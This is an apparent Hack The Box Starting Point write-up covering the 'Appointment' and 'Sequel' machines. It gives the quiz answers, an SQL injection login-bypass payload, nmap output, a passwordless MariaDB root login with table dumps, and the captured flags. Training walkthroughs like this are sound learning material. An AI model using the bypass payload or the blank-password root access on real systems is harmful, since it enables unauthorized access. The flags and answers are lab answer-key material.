Starting Point - Tier1 Hackthebox

### Appointment Given the IP to access the machine, and a bunch of questions to answer: ``` 1. What does the acronym SQL stand for? = Structured Query Language 2. What is one of the most common type of SQL vulnerabilities? = SQL injection 3. What does PII stand for? = Personally Identifiable Information 4. What does OWASP Top 10 list name of classification for this vulnerability? = A03:2021-Injection 5. What service and version are running on port 80 of the target? = Apache httpd 2.4.38 ((Debian)) 6. What is the standard port used for HTTPS protocol? = 443 7. What is one luck-based method of exploiting login pages? = brute-forcing 8. What is a folder called in a web-application terminology? = directory 9. What response code is given for "Not Found" errors? = 404 10. What switch do we use with Gobuster to specify we're looking to discover directories, and not subdomains? = dir 11. What symbol do we use to comment out parts of the code? = # ``` Last Question : ``` Submiting Root Flag ``` So I check the port 80 on the browser and there is a login page I hit it with SQLi login bypass with the payload as `or 1=1 limit 1 #` on the username field and when I login I get the flag! ![](https://i.imgur.com/zyLOk1E.png) --- ### Sequel Starting with an quick scan: ``` Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-09 22:23 EAT Nmap scan report for 10.129.166.120 Host is up (0.21s latency). Not shown: 999 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 3306/tcp open mysql? | mysql-info: | Protocol: 10 | Version: 5.5.5-10.3.27-MariaDB-0+deb10u1 | Thread ID: 67 | Capabilities flags: 63486 | Some Capabilities: InteractiveClient, ConnectWithDatabase, LongColumnFlag, Support41Auth, Speaks41ProtocolOld, SupportsCompression, SupportsLoadDataLocal, SupportsTransactions, ODBCClient, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, IgnoreSigpipes, FoundRows, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments | Status: Autocommit | Salt: 2:i%zY0"Xwm<%@Td{^Ct |_ Auth Plugin Name: mysql_native_password |_sslv2: ERROR: Script execution failed (use -d to debug) |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) |_tls-alpn: ERROR: Script execution failed (use -d to debug) |_ssl-cert: ERROR: Script execution failed (use -d to debug) |_ssl-date: ERROR: Script execution failed (use -d to debug) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 230.82 seconds ``` Now we answer the questions: ``` 1. What does acronym SQL stand for? = Structured Query Language 2. During our scan, which port running mysql do we find? = 3306 3. What community-developed MySQL version is the target running? = MariaDB 4. What switch do we need to use in order to specify a login username for the MySQL service? = -u 5. Which username allows us to log into MariaDB without providing a password? = root 6. What symbol can we use to specify within the query that we want to display eveything inside a table? = * 7. What symbol do we need to end each query with? = ; ``` LIST DATABASES AVAILABLE ``` mysql> show databases; +--------------------+ | Database | +--------------------+ | htb | | information_schema | | mysql | | performance_schema | +--------------------+ 4 rows in set (0.16 sec) ``` USE HTB DATABASE ``` mysql> use htb; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed ``` LIST TABLES AVAILABLE IN THE DB ``` mysql> show tables; +---------------+ | Tables_in_htb | +---------------+ | config | | users | +---------------+ 2 rows in set (3 min 8.79 sec) ``` READ CONFIG ``` mysql> select * from config; +----+-----------------------+----------------------------------+ | id | name | value | +----+-----------------------+----------------------------------+ | 1 | timeout | 60s | | 2 | security | default | | 3 | auto_logon | false | | 4 | max_size | 2M | | 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 | | 6 | enable_uploads | false | | 7 | authentication_method | radius | +----+-----------------------+----------------------------------+ 7 rows in set (0.16 sec) ``` FLAG : `7b4bec00d1a39e3dd4e021ec3d915da8`